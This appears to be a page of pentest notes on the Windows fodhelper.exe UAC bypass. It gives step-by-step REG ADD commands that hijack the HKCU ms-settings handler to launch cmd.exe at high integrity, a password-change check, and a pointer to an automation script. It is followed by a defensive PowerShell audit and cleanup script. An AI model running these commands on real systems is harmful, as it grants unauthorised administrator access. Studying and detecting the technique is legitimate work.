UAC Bypass


Last updated 2 years ago

UAC bypass

User Account Control (UAC)

Vulnerable binary, for example: fodhelper.exe

  • Gather information about the binary's integrity level and the permissions it requires.

    Tool: sigcheck.exe (Sysinternals)

    • In cmd, cd to the SysinternalsSuite directory and run: sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe

    • The manifest output shows that administrator rights are required (requireAdministrator) and autoElevate is true

  • Gather information about how the exe interacts with the file system and the Windows registry.

    Tool: Procmon.exe (Process Monitor) from Sysinternals

    • Open Procmon.exe, start fodhelper.exe, and add the filters below:

    • Filter: Process Name, is, fodhelper.exe, Include

    • Filter: Operation, contains, Reg, Include

    • Filter: Result, is, NAME NOT FOUND, Include

    • Filter: Path, contains, HKCU, Include

    • Apply the filters and look for an interesting path that can be modified. For example, HKCU:\Software\Classes\ms-settings\shell\open\command is worth checking.

    • Now change the Path filter and remove the Result filter: Path, contains, ms-settings\shell\open\command, Include

    • Check whether the process successfully accesses that key in some other hive; the results give more clues. Here, when HKCU:\Software\Classes\ms-settings\shell\open\command is not found, the process falls back to the same path under HKCR, which exists and is read successfully.

    • Because the exe looks up HKCU:\Software\Classes\ms-settings\shell\open\command first, and we have the necessary permission to edit HKCU, that path can be modified.

    • Add the key with the REG utility in cmd: REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command

    • Restart fodhelper.exe with the first four filters applied.

    • The vulnerable exe now looks for a DelegateExecute value in the newly added key.

    • Add DelegateExecute with an empty value in cmd: REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ

    • Restart fodhelper.exe again with the 1st, 2nd and 4th filters applied.

    • This time the lookup is successful, but because DelegateExecute is empty the exe also reads the (Default) value of the Shell\open\command registry key. The (Default) value is created as null automatically when any registry key is added.

    • Replace the empty (Default) value with an executable of our choice, cmd.exe, in cmd: REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f

    • Exploit

      • Restart fodhelper.exe; it now opens cmd.exe automatically at high integrity level

      • To check that high integrity was achieved, try changing the admin password: net user admin Ev!lpass

    • Automation tool

      • Import-Module .\Invoke-EventViewer.ps1

      • Invoke-EventViewer cmd.exe

https://github.com/CsEnox/EventViewer-UACBypass
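The procedure above leaves a fixed set of artefacts on the host: an ms-settings\shell\open\command key under HKCU that does not exist on a clean profile, an empty DelegateExecute value and a (Default) command. The following PowerShell audit script is an added example, not part of the original notes or of any Sysinternals or Microsoft tool; it checks the current user's hive for those artefacts, reports the UAC policy values that decide whether an auto-elevating binary can be abused silently (EnableLUA and ConsentPromptBehaviorAdmin under the Policies\System key), and optionally removes the hijacked key. The -Remove switch, the report layout and the script file name used in the usage note are this example's own assumptions.

```powershell
# Added audit script (not from the original notes): look for the registry
# artefacts the fodhelper.exe bypass leaves behind and report the UAC policy
# settings that govern auto-elevation. The -Remove switch and the output
# layout are this script's own design (assumptions), not a Microsoft feature.
param(
    [switch]$Remove   # delete the hijacked HKCU ms-settings key if it is found
)

# fodhelper.exe queries this HKCU path first; on a clean profile it does not exist.
$hijackKey = 'HKCU:\Software\Classes\ms-settings\shell\open\command'
$policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$findings  = @()

$hijackPresent = Test-Path -LiteralPath $hijackKey
$defaultCmd    = $null
$delegate      = $null

if ($hijackPresent) {
    $props = Get-ItemProperty -LiteralPath $hijackKey
    # The registry provider exposes the (Default) value as the '(default)' property.
    $defaultCmd = $props.'(default)'
    $delegate   = $props.DelegateExecute
    # The key alone is abnormal under HKCU; an empty DelegateExecute plus a
    # (Default) command is exactly the sequence described in the notes.
    $findings += "HKCU ms-settings handler present (DelegateExecute='$delegate', (Default)='$defaultCmd')"
}

# UAC policy: EnableLUA=1 means UAC is on. ConsentPromptBehaviorAdmin=2 is
# "Always notify", the only level at which auto-elevating binaries still prompt.
$policy = Get-ItemProperty -LiteralPath $policyKey
if ($policy.EnableLUA -ne 1) {
    $findings += 'UAC is disabled (EnableLUA != 1)'
} elseif ($policy.ConsentPromptBehaviorAdmin -ne 2) {
    $findings += "UAC below 'Always notify' (ConsentPromptBehaviorAdmin=$($policy.ConsentPromptBehaviorAdmin)); auto-elevate abuse is possible"
}

$summary = if ($findings.Count -gt 0) { $findings -join '; ' } else { 'clean' }

[pscustomobject]@{
    HijackKeyPresent           = $hijackPresent
    DelegateExecute            = $delegate
    DefaultCommand             = $defaultCmd
    EnableLUA                  = $policy.EnableLUA
    ConsentPromptBehaviorAdmin = $policy.ConsentPromptBehaviorAdmin
    Findings                   = $summary
} | Format-List

if ($Remove -and $hijackPresent) {
    # Remove the whole HKCU override so fodhelper.exe falls back to the HKCR handler.
    # Confirm first that no legitimate software created this key for the user.
    Remove-Item -LiteralPath 'HKCU:\Software\Classes\ms-settings' -Recurse -Force
    Write-Output 'Removed HKCU:\Software\Classes\ms-settings'
}
```

Run it as the user whose profile is being checked, for example `.\Audit-FodhelperHijack.ps1` (file name assumed), and add `-Remove` to clean up a confirmed hijack. The two findings complement each other: the HKCU key is the after-the-fact indicator, while ConsentPromptBehaviorAdmin below 2 is the precondition, since at "Always notify" the auto-elevate path still prompts and the technique in the notes does not elevate silently. For continuous detection, the same HKCU path can be watched for key-creation and value-set events, which is a cheaper signal than watching fodhelper.exe itself.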